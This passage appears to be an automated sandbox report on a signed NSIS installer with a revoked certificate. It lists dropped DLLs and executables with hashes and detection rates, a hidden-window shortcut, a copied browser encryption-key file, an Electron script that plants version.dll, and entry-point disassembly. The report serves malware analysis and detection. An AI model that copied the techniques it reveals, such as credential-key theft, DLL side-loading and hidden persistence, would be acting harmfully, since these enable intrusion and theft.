                                                                                                                                                                                            MD5:17309E33B596BA3A5693B4D3E85CF8D7
                                                                                                                                                                                            SHA1:7D361836CF53DF42021C7F2B148AEC9458818C01
                                                                                                                                                                                            SHA-256:996A259E53CA18B89EC36D038C40148957C978C0FD600A268497D4C92F882A93
                                                                                                                                                                                            SHA-512:1ABAC3CE4F2D5E4A635162E16CF9125E059BA1539F70086C2D71CD00D41A6E2A54D468E6F37792E55A822D7082FB388B8DFECC79B59226BBB047B7D28D44D298
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):102400
                                                                                                                                                                                            Entropy (8bit):6.729923587623207
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:WNuZmJ9TDP3ahD2TF7Rq9cJNPhF9vyHf:WNuZ81zaAFHhF9v
                                                                                                                                                                                            MD5:C6A6E03F77C313B267498515488C5740
                                                                                                                                                                                            SHA1:3D49FC2784B9450962ED6B82B46E9C3C957D7C15
                                                                                                                                                                                            SHA-256:B72E9013A6204E9F01076DC38DABBF30870D44DFC66962ADBF73619D4331601E
                                                                                                                                                                                            SHA-512:9870C5879F7B72836805088079AD5BBAFCB59FC3D9127F2160D4EC3D6E88D3CC8EBE5A9F5D20A4720FE6407C1336EF10F33B2B9621BC587E930D4CBACF337803
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                            Entropy (8bit):5.719859767584478
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                                            MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                                            SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                                            SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                                            SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:7-zip archive data, version 0.4
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):83565607
                                                                                                                                                                                            Entropy (8bit):7.999996162121266
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1572864:B2/ebAbW6FLl4oabh+XJhXhQiB1dJdYVkq7U4hmfixR8:d0bthlXOh01VJY+qw0ui38
                                                                                                                                                                                            MD5:44FCFC40B0664FA0916283B8CB16037A
                                                                                                                                                                                            SHA1:1FA51EBFF14BB687D236AB292B716BE1B65F3F81
                                                                                                                                                                                            SHA-256:4FF85E7082475331BDC1DF02A514C2A94D60AF5E91974352C5BFB31EDD056670
                                                                                                                                                                                            SHA-512:C16E179466620037CDC804EE160FA0E68A1CF3D44CA03F452E3A822F0FE19D8ED2FBF6FA94EB1F9DCD5969DE2030A836AD7D021D0A05DE0B27BF5F2E066BDD65
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                                            Entropy (8bit):5.155286976455086
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:YjHFiKaoggCtJzTlKXb0tbo68qD853Ns7GgmkNq3m+s:JbogRtJzTlNR8qD85uGgmkNr
                                                                                                                                                                                            MD5:EC0504E6B8A11D5AAD43B296BEEB84B2
                                                                                                                                                                                            SHA1:91B5CE085130C8C7194D66B2439EC9E1C206497C
                                                                                                                                                                                            SHA-256:5D9CEB1CE5F35AEA5F9E5A0C0EDEEEC04DFEFE0C77890C80C70E98209B58B962
                                                                                                                                                                                            SHA-512:3F918F1B47E8A919CBE51EB17DC30ACC8CFC18E743A1BAE5B787D0DB7D26038DC1210BE98BF5BA3BE8D6ED896DBBD7AC3D13E66454A98B2A38C7E69DAD30BB57
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):434176
                                                                                                                                                                                            Entropy (8bit):6.584811966667578
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                                                                                                                                            MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                                                                                                                                            SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                                                                                                                                            SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                                                                                                                                            SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 15:33:53 2024, mtime=Fri Dec 6 15:34:02 2024, atime=Tue Nov 26 03:14:48 2024, length=188826112, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1152
                                                                                                                                                                                            Entropy (8bit):4.955682296991906
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:8ploH/EtRkaUt5zKanloAhhjAYfrAoGCe7JTqyFm:8G/2RVUtBnhhEM8oGCecyF
                                                                                                                                                                                            MD5:262D422B510221D09CE3B30185FC9175
                                                                                                                                                                                            SHA1:E7F4AA5FF67A69666D61B7BCF29CAA40E68599BE
                                                                                                                                                                                            SHA-256:CE21885412CED4ECD91132F9836B62E4BF2A58AE93AAFD2FBBDDF53B74EC78BD
                                                                                                                                                                                            SHA-512:86698C6564E31E093ACC1DFAE2AAF29B500242E222E56428974E13619761394CA0D379297630B192CFDB6C06A8DEBC00E6FFA2D595CD90212A5A802B23B8DEB2
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:L..................F.... ........G......G....6..?...BA.......................:..DG..Yr?.D..U..k0.&...&......vk.v....X...G......G......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y)............................%..A.p.p.D.a.t.a...B.P.1......Y@...Local.<......CW.^.Y@.....b.........................L.o.c.a.l.....Z.1......Y/...Programs..B......Y...Y/.............................'.P.r.o.g.r.a.m.s.....N.1......Y@...NSIS..:......Y/..Y@............................1..N.S.I.S.....Z.2..BA.zY.! .NSIS.exe..B......Y;..Y;....._.........................N.S.I.S...e.x.e.......b...............-.......a............[.......C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.N.S.I.S.\.N.S.I.S...e.x.e.............:...........|....I.J.H..K..:...`.......X.......287400...........hT..CrF.f4... ..k......,.......hT..CrF.f4... ..k......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2198952
                                                                                                                                                                                            Entropy (8bit):6.563177058140165
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:f0eL6aJyxz8eGSfmOifv0LkifQvl9Hu1QEBWfzbnWKNSq:seLWz8TSfmxfv05Qvl9Hu1fBWfzbnWs
                                                                                                                                                                                            MD5:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            SHA1:8B76990C5061890C94F81F504C5782912A58D8A6
                                                                                                                                                                                            SHA-256:C885DF88693496D5C28AD16A1ECDE259E191F54AD76428857742AF843B846C53
                                                                                                                                                                                            SHA-512:E659A7CF12C6B41879E4CE987E4CD1CEFCE2FFC74E06817667FA833764F36F25CC5F8374DBC844B68B787ACAC011C7B8C8F2B74563BF8A96F623EBB110A593DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):478262
                                                                                                                                                                                            Entropy (8bit):6.641750483832833
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:smYR2v42TPWRk/LBFn6FnelvxRXYQ9WgRuFoj4BEanaMT:u2l6R4V6p49RuFojf6aS
                                                                                                                                                                                            MD5:71EE48D05DCAAF3EDC86C7A8DDC7CFD8
                                                                                                                                                                                            SHA1:9448DAE20207994597047D2796F3E237CA76B287
                                                                                                                                                                                            SHA-256:4776212795CA4946FA4AAD57DF8EE4FB4A4D966CF23FBA6A47AC18B3D8B73B52
                                                                                                                                                                                            SHA-512:814B4456A04D07662888BF35D5F6D40B2CC5938D9EBF77F597D113EF2CAD62C6BAAE9ED9C36765F8DA4FB37A848443A29632F090AD42DAA50AD44EA766A138C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):262144
                                                                                                                                                                                            Entropy (8bit):7.040362388355635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1YY/D4hH334/EDRom7sMD+ztiU6YW9+cYjb0w7C+TS4idLekmS:1YYkhYeRoHt8U6xwcmb0wr1S
                                                                                                                                                                                            MD5:B9C1E07B4B2EDA5D3650ACAD008B8374
                                                                                                                                                                                            SHA1:5F193013D0F9CAA41E1A1B2441E5E969315803C7
                                                                                                                                                                                            SHA-256:A94785C2269DA10BC56B8B2D526E6028B22D62D0961DB3129ABC0208416C119E
                                                                                                                                                                                            SHA-512:67EFFA650CEB69AFBE040385F017F22BA270AB04AB7CF9AB5B2A64F4D0ECB6D6F29809BD49EE9C9F0AD42D9BFBAB595F213FB276259D62F8C48D97431AFD0708
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....IEg...........!.....z..........!........................................`............@.........................@...R.......(....0.......................@..@...x............................... ...................$............................text....x.......z.................. ..`.rdata...`.......b...~..............@..@.data...H...........................@....00cfg....... ......................@..@.rsrc........0......................@..@.reloc..@....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                                            Entropy (8bit):5.666974645428673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:YKWSCuj9rrt+dmGikM5VtMRng3BJx9XoAnNgn:YKWJu5rrtqRMSMx94AnNM
                                                                                                                                                                                            MD5:88D093A2D444CF5DFDEDA96845BFC984
                                                                                                                                                                                            SHA1:F140EDE9420A379CBB7B11BAFA516D21B8F64CE0
                                                                                                                                                                                            SHA-256:6EFEE9C84AA2368E49CE920AEA5A7B5FB80BEC99AB9A41B895BAF202945C764D
                                                                                                                                                                                            SHA-512:A28B453336B955583C8181AF30E8E69ADC33D18674A94DAF8B921252B84AC2BF422D1EAEEE023A161200E0E189B25682265D65F6684D25C7B407EC41AC088BBC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD0xoH2Msy0SIYdC+FIYwlNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAADsTfzAZ58kT+Faog1LeUGcM0qWp/fmiIznVy2lCJvbtgAAAAAOgAAAAAIAACAAAAAfOPl60Rs+SIhCtqMCp3prPDeAqHoPa/hg3o38FcSNSTAAAACFbLZf/hxC0vXsO7OZusr2OTJ71MhJl4jD+S9tuK8AAw2+2HMc3bsUWk/4iC10Y7RAAAAAJi4ZTHhtV+FZOfzt6lhQFUEcIu7AQ2i9QLZAcRWVm8Mq1g+oUoIsPHh+DTHpOwuaeWnq/0FVbvreF6/3oI11VA=="}}
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                                            Entropy (8bit):5.666974645428673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:YKWSCuj9rrt+dmGikM5VtMRng3BJx9XoAnNgn:YKWJu5rrtqRMSMx94AnNM
                                                                                                                                                                                            MD5:88D093A2D444CF5DFDEDA96845BFC984
                                                                                                                                                                                            SHA1:F140EDE9420A379CBB7B11BAFA516D21B8F64CE0
                                                                                                                                                                                            SHA-256:6EFEE9C84AA2368E49CE920AEA5A7B5FB80BEC99AB9A41B895BAF202945C764D
                                                                                                                                                                                            SHA-512:A28B453336B955583C8181AF30E8E69ADC33D18674A94DAF8B921252B84AC2BF422D1EAEEE023A161200E0E189B25682265D65F6684D25C7B407EC41AC088BBC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD0xoH2Msy0SIYdC+FIYwlNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAADsTfzAZ58kT+Faog1LeUGcM0qWp/fmiIznVy2lCJvbtgAAAAAOgAAAAAIAACAAAAAfOPl60Rs+SIhCtqMCp3prPDeAqHoPa/hg3o38FcSNSTAAAACFbLZf/hxC0vXsO7OZusr2OTJ71MhJl4jD+S9tuK8AAw2+2HMc3bsUWk/4iC10Y7RAAAAAJi4ZTHhtV+FZOfzt6lhQFUEcIu7AQ2i9QLZAcRWVm8Mq1g+oUoIsPHh+DTHpOwuaeWnq/0FVbvreF6/3oI11VA=="}}
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226816
                                                                                                                                                                                            Entropy (8bit):6.641421803992435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:6BrX/YVAjaKHMVJcjt4FyZTYTC1leMllGbmPVMpJv:6B7XmFJQtHZTkojllGbmPVMj
                                                                                                                                                                                            MD5:66DE65D980D40F3AAAC3DA64BE631A91
                                                                                                                                                                                            SHA1:E9DB45421829AADF312EE888F5340ADE4545AF89
                                                                                                                                                                                            SHA-256:1CB9FCC2D76F51DBD08D58209C3E732B1ABD0C1C0A3760D95374C68C890FF010
                                                                                                                                                                                            SHA-512:FA8BC38B7C5D663497C1798A292D75F768D528CFE272F23C1CC3A4CDAE80229772832BD45B54D2CE1815D347C941371EB87B84DCC794EAAE515109F5B71F2FB4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...+IEg.........." ......................................................................`.........................................P+..R....0..(............p..................H...p*.............................. ...@............3..H............................text...X........................... ..`.rdata..............................@..@.data...p....P.......8..............@....pdata.......p.......D..............@..@.00cfg..8............V..............@..@.gxfg...p............X..............@..@.retplne.............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2810880
                                                                                                                                                                                            Entropy (8bit):6.3690794133732
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:0Mn9l8jZuRDTmPjRI2/MVAptUKDdKKYmq1dKwdfU2bECbe:pKjObbbH1DFE/
                                                                                                                                                                                            MD5:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            SHA1:ACEC8C7A1C2535963E11151D3FFE68921FA82625
                                                                                                                                                                                            SHA-256:D25B452CCC0FE3A5E39B9BAECD913AFD15758428B52B0C1F50AC85ACA2D3405A
                                                                                                                                                                                            SHA-512:F6D2D8463EAD453131ECD18C61EE8F1D88094A54E42A4F158532B3A6BAB1D7DEA02BDC2CDD8C31975C932CAE43528FF8FDBE20D60E3EDB38C1E3B7073E13EC54
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s.u.s.u.s.u.g.v.v.u.g.q.d.u.g.t.X.u.s.t...u.g.}...u.g.p.m.u.g.r.u.g.w.r.u.Richs.u.........................PE..d....."..........".................`Y.........@..............................+......s+...`................................................. ...|............@..pq............+.....0$..T.......................(....................................................text............................... ..`PAGELK...!.......".................. ..`.rdata..,...........................@..@.data...hh..........................@....pdata..pq...@...r...Z..............@..@.rsrc...............................@..@.reloc........+.. ....*.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1257
                                                                                                                                                                                            Entropy (8bit):5.097274643567763
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:qlXPWlE1ZkX1hXoG7GVz/dIXHiIXd6r61l6oG7GVz/dk6HiR6Sc1c1zcoG7GVz/a:qNOEo1hXb7GVziXHiIXd6r61l6b7GVzH
                                                                                                                                                                                            MD5:FD769BD71900B50DC40A561347A5FAC6
                                                                                                                                                                                            SHA1:7001C2288DE78F69AC96FC1DD2D8A04870412D1E
                                                                                                                                                                                            SHA-256:9034E6CC2F599F0C880F9E914AF2E6A9618D461071DC7132447F7C2458B3E3FA
                                                                                                                                                                                            SHA-512:A89D73FAF623D78BF0A3D0195E4C90797791BA6F1D988A5002B609AF421EDA55204473041CF5C0AEC5812F3CD29D94FEDCF848239564DCB8A9E0DE130F0F36BF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:6906765 (7456) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:07 ---..6906796 (7456) - exe\main.cpp:4044: WinSAT regisrty key missing - create the winsat key..6906796 (7456) - exe\main.cpp:4363: WinSAT registry node is created or present..6906812 (7456) - exe\processwinsaterror.cpp:0319: Writing exit code, cant msg and why msg to registry ..6906812 (7456) - exe\main.cpp:2767: > Not necessary to reenable EMD cache...6906812 (7456) - exe\main.cpp:5040: > exit value = 4.....6910281 (2700) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:10 ---..6910296 (2700) - exe\main.cpp:4363: WinSAT registry node is created or present..6910312 (2700) - exe\processwinsaterror.cpp:0319: Writing exit code, cant msg and why msg to registry ..6910312 (2700) - exe\main.cpp:2767: > Not necessary to reenable EMD cache...6910328 (2700) - exe\main.cpp:5040: > exit value = 4.....6921640 (1028) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:22 ---..6921640 (1028) - exe\main.cpp:4363: WinSAT registry node i
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (427)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1037
                                                                                                                                                                                            Entropy (8bit):5.140269706556241
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:4DFfZRfZe9ecyfrt5YfrYtebE/xmQoNcckXoex:6Zbe9ec+8ESEJmQTH
                                                                                                                                                                                            MD5:EADFF4AE0D1BCDEBF449FF83ECA033C9
                                                                                                                                                                                            SHA1:40F25CDA266E69A7439981A61C3A82CA3470C68E
                                                                                                                                                                                            SHA-256:D3F853499FB0F4924F409B56A9AD8F2F3F822922039AE735BF2749FC9A70C1D3
                                                                                                                                                                                            SHA-512:BE4F56F4EB178A15A4C738B85D4D442E3266D01BD2BFBAD82694C0A7A408AEEA72CC6BD34FFF1AC8050FA4CE063C20C731C39EB6868192C0F92FD238C6503665
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:(node:3444) UnhandledPromiseRejectionWarning: Error: EBUSY: resource busy or locked, copyfile 'C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll' -> 'C:\Users\user\AppData\Roaming\MyElectronApp\version.dll'. at Object.copyFileSync (node:fs:3034:11). at Object.func [as copyFileSync] (node:electron/js2c/node_init:2:2786). at _0x16a65f (C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar\main.js:1:2809). at C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar\main.js:1:4107.(Use `NSIS --trace-warnings ...` to show where the warning was created).(node:3444) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag `--unhandled-rejections=strict` (see https://nodejs.org/api/cli.html#cli_unhandled
                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                            Entropy (8bit):7.9998566203055415
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:YoS6ZBCcUy.exe
                                                                                                                                                                                            File size:84'269'376 bytes
                                                                                                                                                                                            MD5:9e19fd2499e9ffb9ca4eab08d9054a86
                                                                                                                                                                                            SHA1:198946086afa2544e8f86463f15fa321aa45f7e0
                                                                                                                                                                                            SHA256:7fedcec3a38dec8650ae2f64271b19c01372881ce83f1fe4597f85b26c4a0732
                                                                                                                                                                                            SHA512:e4e9cefb633a191f9e562a1fcf4176121b31f69f1d528a3505f381584c5d6c9100982de28684307cfabac7461a173dfd6a12d5d685dffb449d60cba209053d4e
                                                                                                                                                                                            SSDEEP:1572864:Vl2/ebAbW6FLl4oabh+XJhXhQiB1dJdYVkq7U4hmfixRR:VJ0bthlXOh01VJY+qw0ui3R
                                                                                                                                                                                            TLSH:4A0833792642C1B2F23C1AF4A7D367F7008A7E3B4FC5199822DC71F896721A112ED56B
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.
                                                                                                                                                                                            Icon Hash:06233b25a3930321
                                                                                                                                                                                            Entrypoint:0x40338f
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                            Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                                                                                                                            Error Number:-2146762484
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 15/11/2024 01:39:25 14/11/2025 04:40:09
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN="Hebei Yibi Solidification Technology Co., Ltd.", SERIALNUMBER=91130681MA07QJYB30, O="Hebei Yibi Solidification Technology Co., Ltd.", L=Baoding, S=Hebei, C=CN
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:D414BD8A03F75F33F20FADA661B4E3A3
                                                                                                                                                                                            Thumbprint SHA-1:50363EFD8A97C55148C5D130D3C5E68FEBC747BA
                                                                                                                                                                                            Thumbprint SHA-256:DEBC0E4F830C1427DC30D47B7F87D4C5F82C9A4422B1ADD85CE9DE26E72CAEA6
                                                                                                                                                                                            Serial:17AECDF77E844F5C7B34DF5B8FE14BEE
                                                                                                                                                                                            Instruction
                                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                            pop edi
                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                            push 00008001h
                                                                                                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                                                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                            call dword ptr [004080A8h]
                                                                                                                                                                                            call dword ptr [004080A4h]
                                                                                                                                                                                            and eax, BFFFFFFFh
                                                                                                                                                                                            cmp ax, 00000006h
                                                                                                                                                                                            mov dword ptr [0047AEECh], eax
                                                                                                                                                                                            je 00007F9A252C3743h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            call 00007F9A252C69F5h
                                                                                                                                                                                            cmp eax, ebx
                                                                                                                                                                                            je 00007F9A252C3739h
                                                                                                                                                                                            push 00000C00h
                                                                                                                                                                                            call eax
                                                                                                                                                                                            mov esi, 004082B0h
                                                                                                                                                                                            push esi
                                                                                                                                                                                            call 00007F9A252C696Fh
                                                                                                                                                                                            push esi
                                                                                                                                                                                            call dword ptr [00408150h]
                                                                                                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                                                                                                            jne 00007F9A252C371Ch
                                                                                                                                                                                            push 0000000Ah
                                                                                                                                                                                            call 00007F9A252C69C8h
                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                            call 00007F9A252C69C1h
                                                                                                                                                                                            push 00000006h
                                                                                                                                                                                            mov dword ptr [0047AEE4h], eax
                                                                                                                                                                                            call 00007F9A252C69B5h
                                                                                                                                                                                            cmp eax, ebx
                                                                                                                                                                                            je 00007F9A252C3741h
                                                                                                                                                                                            push 0000001Eh
                                                                                                                                                                                            call eax
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            je 00007F9A252C3739h
                                                                                                                                                                                            or byte ptr [0047AEEFh], 00000040h
